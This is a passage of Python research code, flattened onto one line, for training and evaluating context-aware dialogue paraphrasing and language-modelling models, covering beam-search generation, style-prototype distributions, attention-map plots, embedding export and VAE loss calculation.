[par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) for proto_index in range(gen_proto_dists.shape[0]): s = "" if np.max(gen_proto_dists[proto_index]) == 1.0: s = "Proto %i" % np.argmax(gen_proto_dists[proto_index]) elif np.sum(gen_proto_dists[proto_index] == 0.5) == 2: proto_indices = np.where(gen_proto_dists[proto_index] == 0.5)[0] s = "Proto %i and %i" % (proto_indices[0], proto_indices[1]) elif np.all(gen_proto_dists[proto_index] == gen_proto_dists[proto_index,0]): s = "All proto" else: s = "Unknown proto" proto_dist_descriptions.append(s) for par_index in range(par_proto_dist.shape[0]): proto_dist_string = "[%s]" % (", ".join(["%4.2f%%" % (par_proto_dist[par_index,i]*100.0) for i in range(par_proto_dist.shape[1])])) phrase_proto_dist.append(proto_dist_string) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases, phrase_proto_dist)) self.model.train() return gen_list, proto_dist_descriptions def generate_beamsearch_batchwise(self, batch_torch, beam_search_method="diverse"): self.model.eval() # 1.) Put data on GPU par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): p1_res_beam, p2_res_beam, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, beams=8, switch_rate=1.0, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=40, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=True, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0), only_par_1=False, beam_search_method=beam_search_method) _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths = p1_res_beam _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths = p2_res_beam # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() def pad_UNK_weights(UNK_weights): max_shape_1 = max([g.shape[1] for g in UNK_weights]) max_shape_2 = max([g.shape[2] for g in UNK_weights]) UNK_weights = np.stack([np.concatenate([np.concatenate([g, np.zeros((g.shape[0], max_shape_1-g.shape[1], g.shape[2]))], axis=1), np.zeros((g.shape[0], max_shape_1, max_shape_2-g.shape[2]))], axis=2) for g in UNK_weights], axis=0) return UNK_weights gen_par_1_UNK_weigths = [g.cpu().numpy() for g in gen_par_1_UNK_weigths] print([g.shape for g in gen_par_1_UNK_weigths]) gen_par_1_UNK_weigths = pad_UNK_weights(gen_par_1_UNK_weigths) gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = [g.cpu().numpy() for g in gen_par_2_UNK_weigths] gen_par_2_UNK_weigths = pad_UNK_weights(gen_par_2_UNK_weigths) gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_2_words = batch_torch[2].cpu().numpy() par_2_lengths = batch_torch[3].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() par_2_slots = batch_torch[6].cpu().numpy() par_2_slot_lengths = batch_torch[7].cpu().numpy() for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], [par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list def generate_style_dist_batchwise(self, batch_torch): self.model.eval() # 1.) Put data on GPU par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, _, _, _, _ = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths, gen_proto_dists, par_1_proto_dist = self.model.generate_style_dist((par_1_words, par_1_lengths, par_1_masks, par_1_slots, par_1_slot_lengths), max_generation_steps=40) _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths, _, par_2_proto_dist = self.model.generate_style_dist((par_2_words, par_2_lengths, par_2_masks, par_2_slots, par_2_slot_lengths), max_generation_steps=40) # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() phrase_proto_dist = list() proto_dist_descriptions = list() gen_par_1_UNK_weigths = gen_par_1_UNK_weigths.cpu().numpy() gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = gen_par_2_UNK_weigths.cpu().numpy() gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() gen_proto_dists = gen_proto_dists.cpu().numpy() par_1_proto_dist = par_1_proto_dist.cpu().numpy() par_2_proto_dist = par_2_proto_dist.cpu().numpy() par_proto_dist = np.concatenate([par_1_proto_dist, par_2_proto_dist], axis=0) print("Shape gen_par_1_UNK_weigths", gen_par_1_UNK_weigths.shape) par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_2_words = batch_torch[2].cpu().numpy() par_2_lengths = batch_torch[3].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() par_2_slots = batch_torch[6].cpu().numpy() par_2_slot_lengths = batch_torch[7].cpu().numpy() for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], [par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) for proto_index in range(gen_proto_dists.shape[0]): s = "" if np.max(gen_proto_dists[proto_index]) == 1.0: s = "Proto %i" % np.argmax(gen_proto_dists[proto_index]) elif np.sum(gen_proto_dists[proto_index] == 0.5) == 2: proto_indices = np.where(gen_proto_dists[proto_index] == 0.5)[0] s = "Proto %i and %i" % (proto_indices[0], proto_indices[1]) elif np.all(gen_proto_dists[proto_index] == gen_proto_dists[proto_index,0]): s = "All proto" else: s = "Unknown proto" proto_dist_descriptions.append(s) for par_index in range(par_proto_dist.shape[0]): proto_dist_string = "[%s]" % (", ".join(["%4.2f%%" % (par_proto_dist[par_index,i]*100.0) for i in range(par_proto_dist.shape[1])])) phrase_proto_dist.append(proto_dist_string) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases, phrase_proto_dist)) self.model.train() return gen_list, proto_dist_descriptions def generate_styles_batchwise(self, batch_torch): self.model.eval() # 1.) Put data on GPU par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths = self.model.sample_reconstruction_styles((par_1_words, par_1_lengths, par_1_masks, par_1_slots, par_1_slot_lengths, contexts_1_words, contexts_1_lengths), max_generation_steps=40, num_samples=8, sample_context=False, sample_gt=True) _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths = self.model.sample_reconstruction_styles((par_2_words, par_2_lengths, par_2_masks, par_2_slots, par_2_slot_lengths, contexts_2_words, contexts_2_lengths), max_generation_steps=40, num_samples=8, sample_context=False, sample_gt=True) # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() gen_par_1_UNK_weigths = gen_par_1_UNK_weigths.cpu().numpy() gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = gen_par_2_UNK_weigths.cpu().numpy() gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_2_words = batch_torch[2].cpu().numpy() par_2_lengths = batch_torch[3].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() par_2_slots = batch_torch[6].cpu().numpy() par_2_slot_lengths = batch_torch[7].cpu().numpy() for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], [par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths], [input_phrases, input_phrases, generated_paraphrases, generated_paraphrases], [True, True, False, False], [None, None, gen_par_1_UNK_weigths[:,:,1:], gen_par_2_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list def extract_gt_attn(self, batch_torch): self.model.eval() # 1.) Put data on GPU par_1_words, par_1_lengths, _, _, par_1_slots, par_1_slot_lengths, _, _, _, _, _, _ = batch_torch with torch.no_grad(): par_1_attn_semantic, par_1_attn_style, par_1_proto_dist = self.model.encode_gt(_input=(par_1_words, par_1_lengths, par_1_slots, par_1_slot_lengths)) # 3.) Reconstruct generated answer and input input_phrases = list() par_1_words = batch_torch[0].cpu().numpy() par_1_lengths = batch_torch[1].cpu().numpy() par_1_slots = batch_torch[4].cpu().numpy() par_1_slot_lengths = batch_torch[5].cpu().numpy() reconstruct_sentences(par_1_words, par_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, slot_preds=None, list_to_add=input_phrases, add_sents_up=True) # 5.) Put everything in a nice format attn_info = [] print("Attention semantic", par_1_attn_semantic) print("Style attention", par_1_attn_style) for sent_index in range(len(input_phrases)): info = ["Semantic attention: " + str(par_1_attn_semantic[sent_index].cpu().numpy()), "Style attention: " + str(par_1_attn_style[sent_index].cpu().numpy()), "Prototype distribution: " + str(par_1_proto_dist[sent_index].cpu().numpy())] attn_info.append(info) gen_list = list(zip(input_phrases, attn_info)) self.model.train() return gen_list def generate_slot_dist_images(self, writer, iteration): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) # 2.) Push data through network par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): par_1_res, par_2_res, _, _, _, _, _, slot_1_res, slot_2_res, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=40, use_semantic_specific_attn = self.use_semantic_specific_attn) del batch_torch _, par_1_UNK_weights, par_1_preds, par_1_lengths = par_1_res _, slot_1_lengths, slot_1_ids = slot_1_res par_1_UNK_weights = par_1_UNK_weights.cpu().numpy() par_1_preds = par_1_preds.cpu().numpy() par_1_lengths = par_1_lengths.cpu().numpy() par_1_slots = par_1_slots.cpu().numpy() par_1_slot_lengths = par_1_slot_lengths.cpu().numpy() slot_1_lengths = slot_1_lengths.cpu().numpy() slot_1_ids = slot_1_ids.cpu().numpy() id2word = get_id2word_dict() fig = plt.figure() slot_sents = reconstruct_sentences(slot_1_ids, slot_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, add_sents_up=False) pred_sents = reconstruct_sentences(par_1_preds, par_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, slot_preds=par_1_UNK_weights[:,:,1:], add_sents_up=False) for batch_index in range(par_1_UNK_weights.shape[0]): if slot_1_lengths[batch_index] == 0 or par_1_lengths[batch_index] == 0: continue fig = plt.figure() ax = fig.add_subplot(111) sent_attention_map = par_1_UNK_weights[batch_index, :par_1_lengths[batch_index], :slot_1_lengths[batch_index]+1] sent_attention_map = np.concatenate((sent_attention_map[:,0:1], sent_attention_map), axis=1) sent_attention_map[:,0] = (sent_attention_map[:,0] < 0.5) sent_attention_map[:,1] = 1 - sent_attention_map[:,1] sent_attention_map[:,2:] /= np.maximum(np.sum(sent_attention_map[:,2:], axis=-1, keepdims=True), 1e-5) sent_attention_map = np.transpose(sent_attention_map) cax = ax.matshow(sent_attention_map, cmap=plt.cm.gray, vmin=0, vmax=1) ax.set_yticklabels(["use slot (bin)", "use slot"] + slot_sents[batch_index]) ax.set_xticklabels(pred_sents[batch_index], rotation=90) ax.set_yticks(range(2 + slot_1_lengths[batch_index])) ax.set_xticks(range(par_1_lengths[batch_index])) ax.set_yticks(np.arange(-.5, 2 + slot_1_lengths[batch_index], 1), minor=True) ax.set_xticks(np.arange(-.5, par_1_lengths[batch_index], 1), minor=True) ax.grid(which='minor', color='k', linestyle='-', linewidth=1) # Add rectangle for the chosen slots for seq_index in range(sent_attention_map.shape[1]): if sent_attention_map[0,seq_index] == 1: best_ind = np.argmax(sent_attention_map[2:,seq_index]) + 2 ax.add_patch(Rectangle((seq_index-0.5,best_ind-0.5),1,1,linewidth=2,edgecolor=(0.5,1.0,0.5),facecolor='none')) plt.tight_layout() writer.add_figure(tag="train/%s_sample_attention_maps_%i" % (self.name, batch_index), figure=fig, global_step=iteration) plt.close() self.model.train() def finalize_summary(self, writer, iteration, checkpoint_path): # if not self.debug: # self.create_tSNE_embeddings(self.val_dataset, writer, iteration, prefix="val_") # self.create_tSNE_embeddings(self.train_dataset, writer, iteration, prefix="train_") self.export_whole_dataset(self.train_dataset, checkpoint_path, prefix="train_") self.export_whole_dataset(self.val_dataset, checkpoint_path, prefix="val_") def export_whole_dataset(self, dataset, checkpoint_path, prefix="", batch_size=128): self.model.eval() data, data_indices = dataset.get_all_sentences() num_batches = int(math.ceil(len(data) * 1.0 / batch_size)) if self.debug: batch_size = 4 num_batches = min(num_batches, 2) par_semantic_vecs, par_style_vecs, context_style_attn_vecs, context_style_vecs = None, None, None, None par_words = ["%i\t%s" % (d_index, " ".join(d.par_1_words)) for d, d_index in zip(data, data_indices)] context_words = ["\t\t".join([" ".join(c) for c in d.context_1_words]) for d in data] for n in range(num_batches): batch_data = data[n*batch_size:min((n+1)*batch_size, len(data))] with torch.no_grad(): batch_data_input = dataset._data_to_batch(batch_data, toTorch=True) batch_par, batch_par_length, _, _, batch_slots, batch_slot_lengths, _, _, batch_context, batch_context_length, _, _ = batch_data_input par_semantics, par_style, context_style_attn, context_style = self.model.encode_sent_context((batch_par, batch_par_length, batch_slots, batch_slot_lengths, batch_context, batch_context_length)) par_semantics = par_semantics.cpu().numpy() par_style = par_style.cpu().numpy() context_style_attn = context_style_attn.cpu().numpy() context_style = context_style.cpu().numpy() if n == 0: par_semantic_vecs, par_style_vecs, context_style_attn_vecs, context_style_vecs = par_semantics, par_style, context_style_attn, context_style else: par_semantic_vecs = np.concatenate([par_semantic_vecs, par_semantics], axis=0) par_style_vecs = np.concatenate([par_style_vecs, par_style], axis=0) context_style_attn_vecs = np.concatenate([context_style_attn_vecs, context_style_attn], axis=0) context_style_vecs = np.concatenate([context_style_vecs, context_style], axis=0) dir_path = os.path.join(checkpoint_path, prefix+self.name+"_export") os.makedirs(dir_path, exist_ok=True) np.savez_compressed(os.path.join(dir_path, "par_semantic_vecs.npz"), par_semantic_vecs) np.savez_compressed(os.path.join(dir_path, "par_style_vecs.npz"), par_style_vecs) np.savez_compressed(os.path.join(dir_path, "context_style_attn_vecs.npz"), context_style_attn_vecs) np.savez_compressed(os.path.join(dir_path, "context_style_vecs.npz"), context_style_vecs) with open(os.path.join(dir_path, "responses.txt"), "w") as f: f.write("\n".join(par_words)) with open(os.path.join(dir_path, "contexts.txt"), "w") as f: f.write("\n".join(context_words)) def create_tSNE_embeddings(self, dataset, writer, iteration, prefix="", batch_size=64, max_number_batches=15): # tSNE embeddings of styles and semantics self.model.eval() # Prepare metrics number_batches = int(math.ceil(dataset.get_num_examples() * 1.0 / batch_size)) number_batches = min(number_batches, max_number_batches) context_style_embed_list = list() response_style_embed_list = list() semantic_embed_list = list() original_response_list = list() original_context_list = list() # Evaluation loop for batch_ind in range(number_batches): if debug_level() == 0: print("Saving %sembeddings for tSNE: %4.2f%% (batch %i of %i)" % (prefix, 100.0 * batch_ind / number_batches, batch_ind+1, number_batches), end="\r") par_1_words, par_1_lengths, _, _, par_1_slots, par_1_slot_lengths, _, _, contexts_1_words, contexts_1_lengths, _, _ = dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=False, noun_mask=None, mask_prob=0.0) par_semantics, par_style = self.model.encode_sentence((par_1_words, par_1_lengths, par_1_slots, par_1_slot_lengths)) _, context_style = self.model.encode_sentence((contexts_1_words, contexts_1_lengths, None, None)) semantic_embed_list.append(par_semantics) response_style_embed_list.append(par_style[0]) context_style_embed_list.append(context_style[0]) par_1_words = par_1_words.cpu().numpy() par_1_lengths = par_1_lengths.cpu().numpy() par_1_slots = par_1_slots.cpu().numpy() par_1_slot_lengths = par_1_slot_lengths.cpu().numpy() contexts_1_words = contexts_1_words.cpu().numpy() contexts_1_lengths = contexts_1_lengths.cpu().numpy() reconstruct_sentences(par_1_words, par_1_lengths, slot_vals=par_1_slots, slot_lengths=par_1_slot_lengths, list_to_add=original_response_list) reconstruct_sentences(contexts_1_words[:,-1], contexts_1_lengths[:,-1], list_to_add=original_context_list) # -1 to only use last sentence semantic_embeds = torch.cat(semantic_embed_list, dim=0) response_style_embeds = torch.cat(response_style_embed_list, dim=0) context_style_embeds = torch.cat(context_style_embed_list, dim=0) print("Semantic embeds: " + str(semantic_embeds.shape)) print("Response style embeds: " + str(response_style_embeds.shape)) print("Context style embeds: " + str(context_style_embeds.shape)) print("Original response length: " + str(len(original_response_list))) print("Original context length: " + str(len(original_context_list))) writer.add_embedding(semantic_embeds, metadata=original_response_list, tag=prefix + "Semantic_" + self.name, global_step=iteration) writer.add_embedding(response_style_embeds, metadata=original_response_list, tag=prefix + "Response_Style_" + self.name, global_step=iteration) writer.add_embedding(context_style_embeds, metadata=original_context_list, tag=prefix + "Context_Style_" + self.name, global_step=iteration) self.model.train() def export_best_results(self, checkpoint_path, iteration): if False and (not self.debug and iteration < 10000): # Reduce amount of times this function is called. Do not expect best results before 20k return if self.name == "ContextAwareDialogueParaphraseSmall": return print("Exporting best results of %s..." % self.name) TOK_WIDTH = 200 gen_list = self.generate_examples() results_gen = "-- Iteration %i --\n" % iteration for g in gen_list: results_gen += "\n\n" + "="*TOK_WIDTH + "\n" results_gen += g[2] + "\n" results_gen += "-"*TOK_WIDTH + "\n" results_gen += "Generated | %s\n" % (g[3]) results_gen += "Generated (context) | %s\n" % (g[4]) results_gen += "Ground truth | %s\n" % (g[1]) results_gen += "="*TOK_WIDTH + "\n" with open(os.path.join(checkpoint_path, self.name.lower() + "_generation.txt"), "w") as f: f.write(results_gen) gen_list = self.generate_random_style_samples() results_random_styles = "-- Iteration %i --\n" % iteration for g in gen_list: results_random_styles += "\n\n" + "="*TOK_WIDTH + "\n" results_random_styles += "Input:\t%s\n" % (g[0]) results_random_styles += "-"*TOK_WIDTH + "\n" results_random_styles += "\n".join(["Gen (%i):\t%s" % (i, e) for i, e in enumerate(g[1])]) results_random_styles += "\n" + "="*TOK_WIDTH + "\n" with open(os.path.join(checkpoint_path, self.name.lower() + "_random_styles.txt"), "w") as f: f.write(results_random_styles) if True or (self.model.encoder_module.use_prototype_styles and not self.model.encoder_module.no_prototypes_for_context): gen_list, proto_dist_list = [], [] gen_style_list = [] gt_attention_maps = [] gen_beam_std_list, gen_beam_sto_list, gen_beam_div_list = [], [], [] batch_size = 64 number_batches = int(math.ceil(self.test_dataset.get_num_examples() * 1.0 / batch_size)) if self.debug: number_batches = min(number_batches, 2) def export_list(gen_resp_list, name): res = "-- Iteration %i --\n" % iteration for g in gen_resp_list: res += "\n\n" + "="*TOK_WIDTH + "\n" res += "Input:\t%s\n" % (g[0]) res += "-"*TOK_WIDTH + "\n" res += "\n".join(["(%i):\t%s" % (i, e) for i, e in enumerate(g[1])]) with open(os.path.join(checkpoint_path, "%s_%s.txt" % (self.name.lower(), name)), "w") as f: f.write(res) for batch_index in range(number_batches): batch_data_input = self.test_dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=False, noun_mask=False, mask_prob=0.0) glist, protolist = self.generate_style_dist_batchwise(batch_data_input) gslist = self.generate_styles_batchwise(batch_data_input) gt_attn_maps = self.extract_gt_attn(batch_data_input) # start_time = time.time() # gbstdlist = self.generate_beamsearch_batchwise(batch_data_input, beam_search_method="standard") # print("Finished batch of standard beam search in %4.2fs" % (time.time() - start_time)) # start_time = time.time() # gbstolist = self.generate_beamsearch_batchwise(batch_data_input, beam_search_method="stochastic") # print("Finished batch of stochastic beam search in %4.2fs" % (time.time() - start_time)) # start_time = time.time() # gbdivlist = self.generate_beamsearch_batchwise(batch_data_input, beam_search_method="diverse") # print("Finished batch of diverse beam search in %4.2fs" % (time.time() - start_time)) gt_attention_maps += gt_attn_maps gen_list += glist proto_dist_list += protolist # gen_beam_std_list += gbstdlist # gen_beam_sto_list += gbstolist # gen_beam_div_list += gbdivlist gen_style_list += gslist export_list(gt_attention_maps, "gt_attention_maps") export_list(gen_beam_std_list, "beam_standard") export_list(gen_beam_sto_list, "beam_stochastic") export_list(gen_beam_div_list, "beam_diverse") export_list(gen_style_list, "styles") # gen_list, proto_dist_list = self.generate_style_dist() results_style_dist = "-- Iteration %i --\n" % iteration for g in gen_list: results_style_dist += "\n\n" + "="*TOK_WIDTH + "\n" results_style_dist += "Input:\t%s\n" % (g[0]) results_style_dist += "Proto distribution:\t%s\n" % (g[2]) results_style_dist += "-"*TOK_WIDTH + "\n" results_style_dist += "\n".join(["(%s):\t%s" % (name, e) for name, e in zip(proto_dist_list, g[1])]) results_style_dist += "\n" + "="*TOK_WIDTH + "\n" with open(os.path.join(checkpoint_path, self.name.lower() + "_style_dist.txt"), "w") as f: f.write(results_style_dist) class ContextAwareLanguageModelingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=DatasetHandler.load_ContextLM_Book_datasets): super(ContextAwareLanguageModelingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="ContextAwareLanguageModeling" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.KL_scheduler = create_KLScheduler(scheduler_type = get_param_val(model_params, "VAE_scheduler", 1), annealing_func_type = get_param_val(model_params, "VAE_annealing_func", 0), loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0), num_iters = get_param_val(model_params, "VAE_annealing_iters", 10000)) self.summary_dict = {"loss_rec": list(), "loss_VAE": list(), "KL_scheduler": list(), "loss_combined": list(), "style_mu": list(), "style_sigma": list()} def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug, num_context_sents=get_param_val(self.model_params, "num_context_turns", 2)*2-1) def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." par_words, par_lengths, contexts_words, contexts_lengths = self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True) current_tf_ratio = self._get_tf_ratio(iteration) par_res, context_style = self.model.language_modeling(_input = (par_words, par_lengths, contexts_words, contexts_lengths), teacher_forcing = True, teacher_forcing_ratio = current_tf_ratio) loss, loss_VAE, acc = self._calculate_loss(par_res, par_words, context_style) final_loss = loss + loss_VAE * self.KL_scheduler.get(iteration) self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["KL_scheduler"] = [self.KL_scheduler.get(iteration)] self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["style_mu", "style_sigma"], [[context_style[1]], [context_style[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors if t is not None] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, context_style, par_style=None): par_word_dist, slot_dist, _, _ = par_res # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] else: print("[#] WARNING: Batch labels were not shortend. First token ids: \n%s \nSOS index: %i" % (str(batch_labels[:,0]), get_SOS_index())) unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels < 0)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() ## Loss VAE regularization _, style_mu, style_std = context_style if par_style is not None: _, par_style_mu, par_style_std = par_style style_mu = torch.cat([style_mu, par_style_mu], dim=-1) style_std = torch.cat([style_std, par_style_std], dim=-1) loss_VAE = ContextAwareDialogueTask._calc_loss_VAE(style_mu, style_std) return loss, loss_VAE, acc def eval(self, dataset=None, batch_size=64, label_lengths=False, noun_mask=False): return float('nan'), dict() def add_summary(self, writer, iteration): # TODO: Add some example generations here. Either run the model again for some random sentences, or save last training sentences writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), self._get_tf_ratio(iteration), iteration) for key, val in self.summary_dict.items(): if not isinstance(val, list): writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration) self.summary_dict[key] = 0.0 elif len(val) == 0: continue elif not isinstance(val[0], list): writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration) self.summary_dict[key] = list() else: val = [v for sublist in val for v in sublist] if len(val) == 0: continue writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration) self.summary_dict[key] = list() class ContextAwareParaphrasingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets): super(ContextAwareParaphrasingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="ContextAwareParaphrasing" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.KL_scheduler = create_KLScheduler(scheduler_type = get_param_val(model_params, "VAE_scheduler", 1), annealing_func_type = get_param_val(model_params, "VAE_annealing_func", 0), loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0), num_iters = get_param_val(model_params, "VAE_annealing_iters", 10000)) self.cosine_loss_scaling = get_param_val(model_params, "cosine_loss_scaling", 0.0) self.switch_rate = get_param_val(model_params, "switch_rate", 0.8) self.summary_dict = {"loss_rec": list(), "loss_cosine": list(), "loss_VAE": list(), "KL_scheduler": list(), "loss_combined": list(), "style_mu": list(), "style_sigma": list()} def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) self.gen_batch = self.val_dataset.get_random_batch(16 if not self.debug else 2, toTorch=False, label_lengths=True, noun_mask=False, mask_prob=0.0) self.val_dataset.reset_index() self.id2word = get_id2word_dict() self.generated_before = False def 